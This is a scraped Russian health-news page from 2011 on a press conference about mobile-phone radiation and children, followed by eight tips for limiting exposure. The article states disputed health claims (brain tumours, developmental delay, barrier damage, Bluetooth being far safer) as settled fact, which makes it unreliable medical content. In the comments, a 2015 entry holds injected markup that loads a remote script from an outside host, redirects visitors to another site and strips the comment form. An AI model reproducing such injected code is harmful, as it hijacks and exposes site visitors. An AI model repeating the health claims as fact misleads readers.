Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  «Абонент находится в зоне...  >>  «Абонент находится в зоне риска»
 
Обратная связь
 

«Абонент находится в зоне риска»

Размер шрифта
05 мая 2011 00:01
  • google_analytics: false
  • Нравится

«Стоит ли запретить детям пользоваться мобильными телефонами?» Под таким названием в Москве в четверг, 5 мая 2011 года, прошла пресс-конференция российских экспертов по влиянию электромагнитного поля на здоровье человека. Читайте их рекомендации, которые эксперты собираются представить на ближайшем заседании ВОЗ, в нашем материале.

мобильный телефон

Александр Тушкин / «Здоровье-инфо»

В 2011 году количество абонентов в России возросло до 253,4 млн. Согласно опросу Всероссийского центра изучения общественного мнения, 70% из них считают, что использование мобильных телефонов опасно для здоровья, а больше всего рискуют наши дети. Пользователи догадываются, что электромагнитное излучение сотовых может представлять опасность, однако фирмы-производители и операторы сотовой связи отказываются признать вред от излучения. При этом они ссылаются на существующие санитарно-гигиенические нормативы, которые в большинстве своем были разработаны задолго до широкомасштабного распространения сотовой связи в городах.

Эксперты считают, что необходимо сделать переоценку влияния мобильных телефонов на здоровье, особенно здоровье детей. Шведские ученые из Каролинского университета в Стокгольме диагностировали отставание в развитии у детей от 12 лет, которые часто звонили по мобильнику. Кроме того, они считают, что у таких детей увеличен риск заболевания опухолями мозга. «Редакция СанПиН от 2003 года рекомендует ограничить возможности использования мобильных телефонов лицами, не достигшими 18 лет. Только мало кто об этом знает», – сообщил профессор, председатель Российского национального комитета по защите от неионизирующих излучений, Юрий Григорьевич Григорьев.

«Ушная раковина ребенка более мягкая, чем у взрослых, и позволяет ему ближе прижимать аппарат к черепной коробке. Кости черепа более тонкие и хуже экранируют головной мозг от излучения», – считает Юрий Григорьев. Излучение глубже проникает в мозг, а значит, сильнее воздействует на ребенка, делая его более уязвимым по сравнению с взрослым.

«Наибольшему риску подвержены ЦНС и иммунная система. Излучение главным образом влияет на две системы головного мозга: нервные клетки и гемато-энцефалический барьер, который защищает мозг от циркулирующих в крови чуждых веществ, – подчеркнул академик, директор Института медико-биологических проблем РАН, Игорь Ушаков. – Увеличивается дегенерация нервных клеток и проницаемость этого барьера. Вдобавок ребенок становится невнимателен, падает способность к обучению, снижается и творческая активность».

Член научно-консультативного комитета международной программы «Электромагнитное поле и здоровье» ВОЗ Олег Григорьев озвучил конкретные рекомендации. По его словам, фирмы-производители должны маркировать устройства с помощью предупредительных наклеек и предоставлять вкладыши-инструкции, где пользователю наглядно объяснялся бы вред от электромагнитного излучения.

Юрий Григорьевич Григорьев

8 практических советов для взрослых и детей

  • Купите детский мобильный телефон. Некоторые компании предлагают модели сотовых телефонов, разработанные специально для детей. Считается, что излучения от них меньше, чем от «взрослых» телефонов. Помните, что стоимость телефона не имеет значения – почти все они собираются в Китае и работают одинаково. Опасаться стоит только очень старых аппаратов.
  • Объясните ребенку, чем опасен мобильный телефон. Исследования показали, что дети чаще и дольше взрослых разговаривают по сотовому. Объясните ребенку, как часто можно использовать телефон, например, «только для звонков маме и папе».
  • Купите гарнитуру. Устройство представляет собой проводные наушники и микрофон, который крепится на груди. Гарнитура избавляет от необходимости каждый раз доставать телефон и подносить его к уху. Существует также беспроводная Bluetooth-гарнитура, совмещающая микрофон и наушник в одном устройстве. На вопрос журналиста «Здоровья-инфо» эксперты однозначно ответили, что «Голубой зуб» намного безопаснее, чем излучение мобильника.
  • Не подносите мобильный телефон к уху во время набора номера. Выбрав абонента и нажав кнопку вызова, не спешите подносить трубку к уху. В момент набора номера происходит триангуляция мобильного телефона базовыми станциями, расположенными в городе. Мощность излучения возрастает в разы, а после установления связи она падает.
  • Пользуйтесь текстовыми сообщениями. Современные мобильные телефоны позволяют использовать сервисы текстовой коммуникации. Прежде всего, это SMS. Если у вас есть телефон с выходом в Сеть, то вы можете писать сообщения с помощью интернет-чатов. Огромной популярностью пользуется ICQ («аська») – интернет-пейджер, который вы можете бесплатно установить на свой смартфон. Это позволит вам не только сохранить здоровье, но и баланс лицевого счета, потому что трафик, затрачиваемый интернет-пейджерами, намного дешевле SMS.
  • Не заряжайте мобильный телефон рядом со спальным местом. Сотовый, поставленный на зарядку, продолжает работать, связываясь с базовыми станциями несколько раз за ночь. Лучше выключите его или положите как можно дальше от кровати. Минимальное расстояние до головы – 1,5 м.
  • Не используйте мобильный телефон в качестве будильника. Так как вы, скорее всего, положите сотовый рядом с кроватью. Лучше достаньте с антресолей бабушкины механические часы-будильники.
  • Ограничьте использование. Вы серьезно рискуете, если пользуйтесь телефоном более часа в день. Найдите здоровые альтернативы: свяжитесь с родными по проводному телефону. Кстати, радиотелефоны, в том числе и стационарные, даже хуже, чем сотовые, потому что в помещении одновременно находится станция и приемник. Прибегните к услугам ip-телефонии, установив, например, программу Skype, которая позволяет передавать не только голос, но и видеоизображение. Даже если вы звоните с ноутбука через соединение Wi-Fi, то это намного безопаснее, чем мобильная связь.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:12

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как защитить ребенка от педофилов   Лечим головную боль без лекарств   Не ругайтесь на супруга! Голова может болеть из-за секса!   Да здравствует баланс! Пробаланс!  
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 02 апреля 2013Революция в лечении головной боли
 
30 сентября 2010Строгое воспитание меняет анатомию мозга 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Почему у вас болит голова? Самые неожиданные причины
Почему у женщин болит голова?
Что скрывает головная боль

Тесты

Что вы знаете о грудном вскармливании?
Что вы знаете об СДВГ?
Знаете ли вы свой мозг?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.